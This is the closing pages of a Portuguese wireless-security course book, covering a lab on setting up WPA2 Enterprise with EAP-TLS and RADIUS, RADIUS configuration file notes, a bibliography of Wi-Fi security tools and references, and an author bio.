Nesta atividade, configuraremos seu AP para utilizar WPA2 Enterprise, com EAP-TLS e RADIUS. Através da interface de configuração web do AP, configure o AP para WPA2 Enterprise e criptografia AES. Configure o IP e a porta do servidor RADIUS a ser utilizada (normalmente 1812). Insira a chave compartilhada (shared secret) divulgada pelo instrutor, que será usada na autenticação do AP com o servidor RADIUS. Na prática, podemos utilizar alguns softwares, como o Password Amplifier, para gerar uma chave compartilhada forte.

177

Capítulo 10 - Roteiro de Atividades

Atividade 10.3 – Testando a autenticação
Verifique as opções de configuração de sua interface sem fio no Windows, para associação através do WPA2, autenticação 802.1x e método EAP-TLS.

Propriedades do certificado:

Teste a autenticação associando-se ao AP. Observe a troca de pacotes através do Kismet.

Atividade 10.4 – Arquivos de configuração do RADIUS
Este item possui apenas caráter informativo, caso o aluno queira se aprofundar sobre a configuração de servidores RADIUS, assunto que está fora do escopo do curso. Para fazer com que o serviço RADIUS sempre “suba” ao inicializar o Sistema Operacional do servidor Linux, execute:
Segurança em Redes sem Fio

# chkconfig radiusd on
Todos os arquivos de configuração do RADIUS estão localizados em /etc/raddb. Dentre eles destacam-se: 11 radiusd.conf : Arquivo geral de configuração. 11 eap.conf : arquivo de configuração das diretivas EAP a utilizar.

178

11 clients.conf : descrição e credenciais dos diferentes dispositivos que consultam o RADIUS (APS, NAS etc.) 11 users: arquivo onde estão as credenciais dos usuários da rede. Para criar uma Autoridade Certificadora (CA) e o certificado, pode-se usar os scripts contidos em: http://www.alphacore.net/contrib/nantes-wireless/eap-tls-HOWTO.html

# cd /etc/raddb/certs
11 CA.root: cript de criação da CA. 11 CA.server: script de criação dos certificados para o servidor (Fully Qualified Domain Nome – FQDN). 11 CA.client: script de criação de certificados para cada usuário. Não confundir com clients.conf do RADIUS. 11 Xpextensions: OID para EAP-TLS. 11 Copiar os arquivos root.der (certificado da CA) e <usuário>.p12 (chave privada e certificado do cliente). Para mais informações, acesse:

# man radiusd

179

Capítulo 10 - Roteiro de Atividades

180

Segurança em Redes sem Fio

Bibliografia
11 Aircrack-ng – http://www.aircrack-ng.org 11 Aircrack-ptw – http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/ 11 AirPcap: The USB 2.0 Wireless Capture Adapter for Windows that enables Wireless Capture with Wireshark – http://www.cacetech.com/products/airpcap.htm 11 ANATEL: Resolução nº 506 de 1º de julho de 2008 – http://www.anatel.gov.br/ 11 Bluetooth – http://www.bluetooth.com 11 CoWPAtty – http://wirelessdefence.org/Contents/coWPAttyMain.htm 11 Daily Wireless – http://www.dailywireless.org/ 11 FLUHRER, Scott ; MANTIN, Itsik ; SHAMIR, Adi. Weaknesses in the Key Scheduling Algorithm of RC4 – http://www.drizzle.com/~aboba/IEEE/rc4_ksaproc.pdf 11 GT Rede Mesh – http://www.rnp.br/pd/gts2005-2006/mesh.html 11 Host AP driver for Intersil Prism2/2.5/3, hostapd and WPA Supplicant – http://hostap.epitest.fi/ 11 How to Setup a Capture – http://wiki.wireshark.org/CaptureSetup 11 John the Ripper password cracker – http://www.openwall.com/john/ 11 KARMA Wireless Client Security Assessment Tools – http://www.theta44.org/main.html 11 Linux wireless LAN support – http://linux-wless.passys.nl/ 11 Linux WPA/WPA2/IEEE 802.1X Supplicant – http://hostap.epitest.fi/wpa_supplicant/ 11 Linux WPA/WPA2/IEEE 802.1X Supplicant – http://hostap.epitest.fi/wpa_supplicant/ 11 MadWifi – http://madwifi.org/ 11 Microsoft Windows Silent Adhoc Network Advertisement – 11 MPL/GPL drivers for the Wavelan IEEE/Orinoco and others – http://www.hpl.hp.com/
Bibliografia

http://www.nmrc.org/pub/advise/20060114.txt

181

11 Muni Wireless – http://www.muniwireless.com/ 11 Nessus – http://www.nessus.org 11 NIST Computer Security DRAFT Publications – http://csrc.nist.gov/publications/drafts.html 11 Padrões do grupo IEEE 802.11 – http://grouper.ieee.org/groups/802/11/ 11 Project IEEE 802.11 Task Group w: Protected Management Frames – http://grouper.ieee.org/groups/802/11/Reports/tgw_update.htm 11 Recomendações Wi-Fi Alliance – http://www.wi-fi.org 11 San Francisco TechConnect – http://www.sfgov.org/site/tech_connect_page.asp 11 SANS ISC Handler’s Diary February 22nd 2005 (Wireless Standards) – http://isc.sans.org/diary.php?date=2005-02-22 11 SANS ISC Handler’s Diary November 10th 2005 (More 802.11 soup) – http://isc.sans.org/diary.php?storyid=837 11 Secure works black hat coverage: senior secure works researcher exposes vulnerabilities in Wireless Device Drivers at Black Hat Conference – http://www.secureworks.com/newsandevents/blackhatcoverage.html 11 Status of Project IEEE 802.11 Task Group W (Protected Management Frames) – http://grouper.ieee.org/groups/802/11/Reports/tgw_update.htm 11 TCPdump/libpcap – http://www.tcpdump.org/ 11 Technet Script Center: Scripting Tools and Utilities – http://www.microsoft.com/technet/scriptcenter/createit.mspx 11 The IEEE 802.16 Working Group on Broadband Wireless Access Standards – http://grouper.ieee.org/groups/802/16/ 11 The Linux-WLAN Project – http://www.linux-wlan.org/ 11 Tim Newsham: WLAN Tools (wep_crack) – http://lava.net/~newsham/wlan/ 11 Understanding 802.11 Frame Types – http://www.wifiplanet.com 11 WepAttack – http://wepattack.sourceforge.net/ 11 WiMAX Forum – http://www.wimaxforum.org 11 WinPcap – http://www.winpcap.org/ 11 Wireless Tools for Linux – http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/ 11 Wireless Tools for Linux – http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/Tools.html
Segurança em Redes sem Fio

11 Wireshark – http://www.wireshark.org/ 11 Wireshark Display Filter Reference: IEEE 802.11 wireless LAN – http://wireshark.org/docs/dfref/w/wlan.html 11 WRIGHT, Joshua. Best EAP for an enterprise wireless LAN. NetworkWorld.com – http://www.networkworld.com/columnists/2006/062606-wirelesssecurity.html

182

Ronaldo Vasconcellos é formado em Análise de Sistemas (PUC Campinas), com especialização em redes (IC Unicamp) e certificações GIAC Certified Incident Handler (GCIH) e GIAC Assessing and Auditing Wireless Networks (GAWN). Trabalha com segurança computacional desde 2002 (seis anos na área de Resposta a Incidentes Computacionais), e desde 2010 na área de pesquisa em Ameaças Cibernéticas e Cibercrime, com foco no Brasil e Ibero-América.

O curso tem por objetivo capacitar o participante para a realização da segurança do ambiente wireless da sua organização. Serão ensinados os fundamentos de radiofrequência e identificados os principais protocolos e normas envolvidas na comunicação Wi-Fi. Com ênfase em redes IEEE 802.11a/b/g/n, serão apresentados os riscos que ameaçam este tipo de rede, e técnicas para mitigá-los com uso de ferramentas baseadas em Linux e Windows. Serão desenvolvidas as competências para a estruturação de uma rede sem fio de forma segura e atendendo a todos os requisitos necessários para impedir os principais ataques. O aluno será ainda familiarizado com ferramentas livres para verificação da rede e realização de auditorias de segurança. Este livro inclui os roteiros das atividades práticas e o conteúdo dos slides apresentados em sala de aula, apoiando profissionais na disseminação deste conhecimento em suas organizações ou localidades de origem.

LIVRO DE APOIO AO CURSO

ISBN 978–85–63630–30–8

9 788563 630308

Sign up to vote on this title
UsefulNot useful